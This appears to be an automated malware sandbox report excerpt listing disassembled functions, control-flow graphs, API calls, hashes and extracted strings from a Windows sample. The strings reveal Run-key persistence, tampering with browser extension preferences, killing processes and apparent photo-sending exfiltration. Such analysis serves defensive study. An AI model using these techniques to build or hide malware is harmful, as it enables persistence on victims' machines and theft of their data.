                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                  • Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                  • Instruction ID: 535214d37bf8c7471bdd47007ca668d546700058b4da72569195388c016918ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                  • Instruction Fuzzy Hash: 34C1C232B28A8186FB10DF74E891AAC7771F769BA8F400229DE5E57395CF38E055CB50
                                                                                                                                                                  Function 00007FF72CA0D544 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 143timeCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 7210 7ff72ca0d544-7ff72ca0d579 call 7ff72ca0c9c0 call 7ff72ca0c9c8 call 7ff72ca0ca30 7217 7ff72ca0d6b7-7ff72ca0d725 call 7ff72c9fcd60 call 7ff72ca1695c 7210->7217 7218 7ff72ca0d57f-7ff72ca0d58a call 7ff72ca0c9d0 7210->7218 7230 7ff72ca0d727-7ff72ca0d72e 7217->7230 7231 7ff72ca0d733-7ff72ca0d736 7217->7231 7218->7217 7223 7ff72ca0d590-7ff72ca0d59b call 7ff72ca0ca00 7218->7223 7223->7217 7229 7ff72ca0d5a1-7ff72ca0d5c4 call 7ff72ca08340 GetTimeZoneInformation 7223->7229 7241 7ff72ca0d5ca-7ff72ca0d5eb 7229->7241 7242 7ff72ca0d68c-7ff72ca0d6b6 call 7ff72ca0c9b8 call 7ff72ca0c9a8 call 7ff72ca0c9b0 7229->7242 7233 7ff72ca0d7c3-7ff72ca0d7c6 7230->7233 7234 7ff72ca0d738 7231->7234 7235 7ff72ca0d76d-7ff72ca0d780 call 7ff72ca0a168 7231->7235 7238 7ff72ca0d73b 7233->7238 7239 7ff72ca0d7cc-7ff72ca0d7d4 call 7ff72ca0d2c8 7233->7239 7234->7238 7246 7ff72ca0d78b-7ff72ca0d7a6 call 7ff72ca1695c 7235->7246 7247 7ff72ca0d782 7235->7247 7243 7ff72ca0d740-7ff72ca0d76c call 7ff72ca08340 call 7ff72c9f2770 7238->7243 7244 7ff72ca0d73b call 7ff72ca0d544 7238->7244 7239->7243 7248 7ff72ca0d5ed-7ff72ca0d5f3 7241->7248 7249 7ff72ca0d5f6-7ff72ca0d5fd 7241->7249 7244->7243 7266 7ff72ca0d7a8-7ff72ca0d7ab 7246->7266 7267 7ff72ca0d7ad-7ff72ca0d7bf call 7ff72ca08340 7246->7267 7253 7ff72ca0d784-7ff72ca0d789 call 7ff72ca08340 7247->7253 7248->7249 7255 7ff72ca0d5ff-7ff72ca0d607 7249->7255 7256 7ff72ca0d611 7249->7256 7253->7234 7255->7256 7262 7ff72ca0d609-7ff72ca0d60f 7255->7262 7260 7ff72ca0d613-7ff72ca0d687 call 7ff72ca199f0 * 4 call 7ff72ca01824 call 7ff72ca0d7dc * 2 7256->7260 7260->7242 7262->7260 7266->7253 7267->7233
                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D572
                                                                                                                                                                    • Part of subcall function 00007FF72CA0CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0CA44
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D583
                                                                                                                                                                    • Part of subcall function 00007FF72CA0C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0C9E4
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D594
                                                                                                                                                                    • Part of subcall function 00007FF72CA0CA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0CA14
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF72CA0D7D4), ref: 00007FF72CA0D5BB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                  • String ID: *L\(&.$Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 3458911817-1557497274
                                                                                                                                                                  • Opcode ID: 2944c04eb7c41efa3648f624bd773368126fd2a2f81730bb4c178720c0af1b5c
                                                                                                                                                                  • Instruction ID: 12c33a8cb8da50f6c631b65f7473eac2d063a7f5e39aec66156c93409656ae30
                                                                                                                                                                  • Opcode Fuzzy Hash: 2944c04eb7c41efa3648f624bd773368126fd2a2f81730bb4c178720c0af1b5c
                                                                                                                                                                  • Instruction Fuzzy Hash: 84513232E1864286F720FF71BC91AA9A670FBA87A4F805135DA4D47696DF3DE440CB60
                                                                                                                                                                  Function 00007FF72C9BA691 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 310fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$1$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                  • API String ID: 1745604696-1086011483
                                                                                                                                                                  • Opcode ID: 302d14e2479f379c21ca987c68d88d4f40f7e596c6409efbd4202fd291e07638
                                                                                                                                                                  • Instruction ID: f7580db4bf636d55528e62acaf39fc4f6d2d5aea0b001cb8968ea1506e10f667
                                                                                                                                                                  • Opcode Fuzzy Hash: 302d14e2479f379c21ca987c68d88d4f40f7e596c6409efbd4202fd291e07638
                                                                                                                                                                  • Instruction Fuzzy Hash: 7ED1B962A58B8551EA20EB15E84437EA361FBA57B0F908631DADD036D5DF7CE480CB10
                                                                                                                                                                  Function 00007FF72C9C3A10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 169registryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 5851 7ff72c9c3a10-7ff72c9c3a62 RegOpenKeyExA 5852 7ff72c9c3b02-7ff72c9c3b0c 5851->5852 5853 7ff72c9c3a68-7ff72c9c3a8e 5851->5853 5854 7ff72c9c3b11-7ff72c9c3b19 5852->5854 5855 7ff72c9c3b0e 5852->5855 5856 7ff72c9c3a90-7ff72c9c3a97 5853->5856 5858 7ff72c9c3b1e-7ff72c9c3b4b RegSetValueExA RegCloseKey 5854->5858 5859 7ff72c9c3b1b 5854->5859 5855->5854 5856->5856 5857 7ff72c9c3a99-7ff72c9c3aac call 7ff72c9d44a0 5856->5857 5871 7ff72c9c3ae0-7ff72c9c3b01 call 7ff72c9f2770 5857->5871 5872 7ff72c9c3aae-7ff72c9c3ac0 5857->5872 5861 7ff72c9c3b51-7ff72c9c3b66 5858->5861 5862 7ff72c9c3c50-7ff72c9c3c6c 5858->5862 5859->5858 5863 7ff72c9c3cd9-7ff72c9c3cdf call 7ff72c9b2410 5861->5863 5864 7ff72c9c3b6c-7ff72c9c3b71 5861->5864 5865 7ff72c9c3c73-7ff72c9c3c7a 5862->5865 5867 7ff72c9c3b76-7ff72c9c3bd6 call 7ff72c9d60e0 call 7ff72c9d08c0 5864->5867 5868 7ff72c9c3b73 5864->5868 5865->5865 5870 7ff72c9c3c7c-7ff72c9c3c8f call 7ff72c9d44a0 5865->5870 5890 7ff72c9c3bd8-7ff72c9c3bea 5867->5890 5891 7ff72c9c3c0b-7ff72c9c3c14 5867->5891 5868->5867 5870->5871 5885 7ff72c9c3c95-7ff72c9c3ca7 5870->5885 5876 7ff72c9c3ac2-7ff72c9c3ad5 5872->5876 5877 7ff72c9c3adb call 7ff72c9f2790 5872->5877 5876->5877 5881 7ff72c9c3cd3-7ff72c9c3cd8 call 7ff72c9fcd30 5876->5881 5877->5871 5881->5863 5885->5877 5889 7ff72c9c3cad-7ff72c9c3cc0 5885->5889 5889->5881 5892 7ff72c9c3cc2 5889->5892 5893 7ff72c9c3c05-7ff72c9c3c0a call 7ff72c9f2790 5890->5893 5894 7ff72c9c3bec-7ff72c9c3bff 5890->5894 5891->5871 5895 7ff72c9c3c1a-7ff72c9c3c2c 5891->5895 5892->5877 5893->5891 5894->5893 5896 7ff72c9c3cc7-7ff72c9c3ccc call 7ff72c9fcd30 5894->5896 5895->5877 5898 7ff72c9c3c32-7ff72c9c3c45 5895->5898 5901 7ff72c9c3ccd-7ff72c9c3cd2 call 7ff72c9fcd30 5896->5901 5898->5901 5902 7ff72c9c3c4b 5898->5902 5901->5881 5902->5877
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue
                                                                                                                                                                  • String ID: ' to startup.$*L\(&.$Error adding startup program: $Error opening registry key: $Software\Microsoft\Windows\CurrentVersion\Run$Successfully added '
                                                                                                                                                                  • API String ID: 31251203-1506508757
                                                                                                                                                                  • Opcode ID: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
                                                                                                                                                                  • Instruction ID: 77b0dd3b80e150520b8df861d7142856cebaf773a9a325edaf18d109cca2b97c
                                                                                                                                                                  • Opcode Fuzzy Hash: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
                                                                                                                                                                  • Instruction Fuzzy Hash: DC719572A18B4141EA10AB25E84436DA361FBA97F0F904331EABD13AD9DF3CE590CF54
                                                                                                                                                                  Function 00007FF72C9EE7C8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 5906 7ff72c9ee7c8-7ff72c9ee811 call 7ff72c9ee770 5909 7ff72c9ee813 5906->5909 5910 7ff72c9ee84e-7ff72c9ee851 5906->5910 5911 7ff72c9ee816-7ff72c9ee83a SetFileInformationByHandle 5909->5911 5912 7ff72c9ee9bb-7ff72c9ee9c2 5910->5912 5913 7ff72c9ee857-7ff72c9ee871 call 7ff72c9ee770 5910->5913 5914 7ff72c9ee83c-7ff72c9ee840 5911->5914 5915 7ff72c9ee8b8-7ff72c9ee8c3 GetLastError 5911->5915 5917 7ff72c9ee9d3 5912->5917 5918 7ff72c9ee9c4-7ff72c9ee9c7 5912->5918 5913->5911 5928 7ff72c9ee873-7ff72c9ee882 5913->5928 5919 7ff72c9ee843-7ff72c9ee847 5914->5919 5923 7ff72c9ee8c5-7ff72c9ee8c8 5915->5923 5924 7ff72c9ee8db-7ff72c9ee8e5 call 7ff72c9ee03c 5915->5924 5922 7ff72c9ee9d5 5917->5922 5918->5917 5921 7ff72c9ee9c9-7ff72c9ee9cc 5918->5921 5925 7ff72c9ee892-7ff72c9ee8b7 call 7ff72c9f2770 5919->5925 5926 7ff72c9ee849-7ff72c9ee84c 5919->5926 5921->5917 5929 7ff72c9ee9ce-7ff72c9ee9d1 5921->5929 5935 7ff72c9ee9dd-7ff72c9ee9e2 call 7ff72ca01774 5922->5935 5923->5924 5930 7ff72c9ee8ca-7ff72c9ee8cd 5923->5930 5924->5914 5938 7ff72c9ee8eb-7ff72c9ee8ee 5924->5938 5932 7ff72c9ee884-7ff72c9ee88c CloseHandle 5926->5932 5928->5925 5928->5932 5929->5917 5929->5922 5930->5924 5931 7ff72c9ee8cf 5930->5931 5937 7ff72c9ee8d3-7ff72c9ee8d6 5931->5937 5932->5925 5932->5935 5942 7ff72c9ee9e3-7ff72c9ee9eb call 7ff72ca01774 5935->5942 5937->5919 5938->5931 5941 7ff72c9ee8f0-7ff72c9ee8f3 5938->5941 5941->5931 5943 7ff72c9ee8f5-7ff72c9ee90c GetFileInformationByHandleEx 5941->5943 5945 7ff72c9ee90e 5943->5945 5946 7ff72c9ee93b-7ff72c9ee940 5943->5946 5948 7ff72c9ee912-7ff72c9ee918 GetLastError 5945->5948 5949 7ff72c9ee9b5-7ff72c9ee9b9 5946->5949 5950 7ff72c9ee942-7ff72c9ee95c SetFileInformationByHandle 5946->5950 5952 7ff72c9ee91b-7ff72c9ee91f 5948->5952 5951 7ff72c9ee99a-7ff72c9ee9a1 5949->5951 5950->5945 5953 7ff72c9ee95e-7ff72c9ee968 call 7ff72c9ee03c 5950->5953 5951->5952 5952->5925 5955 7ff72c9ee925-7ff72c9ee930 CloseHandle 5952->5955 5958 7ff72c9ee973-7ff72c9ee976 5953->5958 5959 7ff72c9ee96a-7ff72c9ee971 5953->5959 5955->5942 5957 7ff72c9ee936 5955->5957 5957->5925 5960 7ff72c9ee9a6-7ff72c9ee9b0 GetLastError 5958->5960 5961 7ff72c9ee978-7ff72c9ee994 SetFileInformationByHandle 5958->5961 5959->5952 5960->5937 5961->5948 5961->5951
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2221425841-578493202
                                                                                                                                                                  • Opcode ID: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                  • Instruction ID: ea6ff57164188f3ca2e147095470d080db346ebd3b99c2c42711e177cbbb30a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                  • Instruction Fuzzy Hash: D151B431F0C6C289F764AB715C006BDBBA4EB357B4F840236CD9E56AD8DE28E4018B61
                                                                                                                                                                  Function 00007FF72C9C0D05 Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 451COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                  • String ID: File parse failed$\Extensions$\Preferences$\Secure Preferences$developer_mode$extensions$name$pinned_extensions$profile
                                                                                                                                                                  • API String ID: 2697701713-219585183
                                                                                                                                                                  • Opcode ID: e7e34766d18897c14f6b3ed873318c8129d138f170e2966466770a0b5afc195d
                                                                                                                                                                  • Instruction ID: 9f878d9cfaa74cd645d719e59d6a37671e9a37b7f619401f8200e183e2cd654f
                                                                                                                                                                  • Opcode Fuzzy Hash: e7e34766d18897c14f6b3ed873318c8129d138f170e2966466770a0b5afc195d
                                                                                                                                                                  • Instruction Fuzzy Hash: F4328F62A1CBC291EA31EB14E8903EEA365FBA4764F804132D6CD57A99EF7CD544CF10
                                                                                                                                                                  Function 00007FF72C9C7970 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 121COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$Enum$BaseCloseHandleModuleModulesNameOpenProcessesTerminate
                                                                                                                                                                  • String ID: *L\(&.$Failed to enumerate processes$Failed to terminate process: $Successfully terminated process:
                                                                                                                                                                  • API String ID: 3307072288-2419563426
                                                                                                                                                                  • Opcode ID: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                  • Instruction ID: 5b2dbcb1ff861104c070a681ba026408e21b6d3d5aef11918f268d3f8cbf0322
                                                                                                                                                                  • Opcode Fuzzy Hash: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                  • Instruction Fuzzy Hash: 29516271A0C68281EA20AB11FC416FAE371FFA97E4F804131DA9D53699EE7CE245CF50
                                                                                                                                                                  Function 00007FF72C9BA810 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 6846 7ff72c9ba810-7ff72c9ba86e 6847 7ff72c9ba870 6846->6847 6848 7ff72c9ba873-7ff72c9ba8ce call 7ff72c9ee0b4 call 7ff72c9b3ab0 call 7ff72c9d17c0 6846->6848 6847->6848 6854 7ff72c9ba8d3-7ff72c9ba8d5 6848->6854 6855 7ff72c9bac76-7ff72c9bac89 call 7ff72c9b4d50 6854->6855 6856 7ff72c9ba8db-7ff72c9ba8e4 6854->6856 6866 7ff72c9bac8a-7ff72c9bac8f call 7ff72c9fcd30 6855->6866 6858 7ff72c9ba8e6-7ff72c9ba8fd 6856->6858 6859 7ff72c9ba91d-7ff72c9ba933 6856->6859 6863 7ff72c9ba8ff-7ff72c9ba912 6858->6863 6864 7ff72c9ba918 call 7ff72c9f2790 6858->6864 6861 7ff72c9ba941-7ff72c9ba955 6859->6861 6862 7ff72c9ba935-7ff72c9ba939 6859->6862 6867 7ff72c9ba963-7ff72c9ba978 6861->6867 6868 7ff72c9ba957-7ff72c9ba95b 6861->6868 6862->6861 6863->6864 6863->6866 6864->6859 6876 7ff72c9bac90-7ff72c9bac9f call 7ff72c9b4d50 6866->6876 6870 7ff72c9ba9bf-7ff72c9ba9c7 6867->6870 6871 7ff72c9ba97a-7ff72c9ba985 6867->6871 6868->6867 6875 7ff72c9ba9d0-7ff72c9ba9db 6870->6875 6873 7ff72c9ba9b7 6871->6873 6874 7ff72c9ba987-7ff72c9ba9a2 6871->6874 6873->6870 6874->6873 6888 7ff72c9ba9a4-7ff72c9ba9b5 6874->6888 6877 7ff72c9ba9e1-7ff72c9baa08 call 7ff72c9b55a0 6875->6877 6878 7ff72c9babb5-7ff72c9babc0 6875->6878 6894 7ff72c9baca0-7ff72c9baca5 call 7ff72c9fcd30 6876->6894 6891 7ff72c9baa0a-7ff72c9baa12 6877->6891 6892 7ff72c9baa18-7ff72c9baa1b 6877->6892 6882 7ff72c9bac02-7ff72c9bac05 6878->6882 6883 7ff72c9babc2-7ff72c9babcd 6878->6883 6885 7ff72c9bac3f-7ff72c9bac75 call 7ff72c9f2770 6882->6885 6886 7ff72c9bac07-7ff72c9bac12 6882->6886 6889 7ff72c9babcf-7ff72c9babea 6883->6889 6890 7ff72c9babfa 6883->6890 6886->6885 6893 7ff72c9bac14-7ff72c9bac2e 6886->6893 6888->6870 6889->6890 6902 7ff72c9babec-7ff72c9babf4 6889->6902 6890->6882 6891->6876 6891->6892 6897 7ff72c9baa21-7ff72c9baa29 6892->6897 6898 7ff72c9bab9b-7ff72c9babaa call 7ff72c9b4f80 6892->6898 6893->6885 6911 7ff72c9bac30-7ff72c9bac3e 6893->6911 6912 7ff72c9baca6-7ff72c9bacab call 7ff72c9fcd30 6894->6912 6904 7ff72c9baa2e-7ff72c9baa44 call 7ff72c9b3c20 6897->6904 6905 7ff72c9baa2b 6897->6905 6913 7ff72c9babb0 6898->6913 6914 7ff72c9bacac-7ff72c9bacd2 call 7ff72c9b4c60 6898->6914 6902->6890 6918 7ff72c9baa46-7ff72c9baa4d 6904->6918 6919 7ff72c9baa7e-7ff72c9baac3 call 7ff72c9d4160 call 7ff72c9b3f60 6904->6919 6905->6904 6911->6885 6912->6914 6913->6875 6926 7ff72c9bacd4 6914->6926 6927 7ff72c9bacd7-7ff72c9bace0 6914->6927 6924 7ff72c9baa4f-7ff72c9baa53 6918->6924 6925 7ff72c9baa55-7ff72c9baa5c 6918->6925 6937 7ff72c9baac5-7ff72c9baaf5 6919->6937 6938 7ff72c9baaf7-7ff72c9bab02 call 7ff72c9d7d80 6919->6938 6924->6925 6929 7ff72c9baa5e-7ff72c9baa61 6924->6929 6925->6918 6925->6929 6926->6927 6931 7ff72c9bace2-7ff72c9bacf4 6927->6931 6932 7ff72c9bad30-7ff72c9bad41 6927->6932 6929->6919 6933 7ff72c9baa63-7ff72c9baa6e 6929->6933 6935 7ff72c9bacf7-7ff72c9bacfa 6931->6935 6933->6919 6936 7ff72c9baa70-7ff72c9baa74 6933->6936 6939 7ff72c9bad15-7ff72c9bad18 6935->6939 6940 7ff72c9bacfc-7ff72c9bad13 call 7ff72ca19d90 6935->6940 6936->6919 6941 7ff72c9baa76-7ff72c9baa7c 6936->6941 6943 7ff72c9bab03-7ff72c9bab0f 6937->6943 6938->6943 6939->6932 6945 7ff72c9bad1a-7ff72c9bad1d 6939->6945 6940->6939 6952 7ff72c9bad1f-7ff72c9bad2f 6940->6952 6941->6919 6941->6933 6947 7ff72c9bab11-7ff72c9bab23 6943->6947 6948 7ff72c9bab43-7ff72c9bab62 6943->6948 6945->6935 6950 7ff72c9bab25-7ff72c9bab38 6947->6950 6951 7ff72c9bab3e call 7ff72c9f2790 6947->6951 6948->6898 6953 7ff72c9bab64-7ff72c9bab7b 6948->6953 6950->6894 6950->6951 6951->6948 6955 7ff72c9bab96 call 7ff72c9f2790 6953->6955 6956 7ff72c9bab7d-7ff72c9bab90 6953->6956 6955->6898 6956->6912 6956->6955
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$1$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
                                                                                                                                                                  • API String ID: 1686256323-547103015
                                                                                                                                                                  • Opcode ID: dc43d232e4247356cf47546e23c2d7af4d26eafae193d06c5c4db65f53e63fe9
                                                                                                                                                                  • Instruction ID: faeb2369b1c601e5bbe4a795447626dbf2c28ea2e748c15c691e805a714e9171
                                                                                                                                                                  • Opcode Fuzzy Hash: dc43d232e4247356cf47546e23c2d7af4d26eafae193d06c5c4db65f53e63fe9
                                                                                                                                                                  • Instruction Fuzzy Hash: 18E1C762A58B8591DA60EB25E94037EF361FBA5BB0F948231DADD03795DF3CE481CB10
                                                                                                                                                                  Function 00007FF72C9C5850 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 130processCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
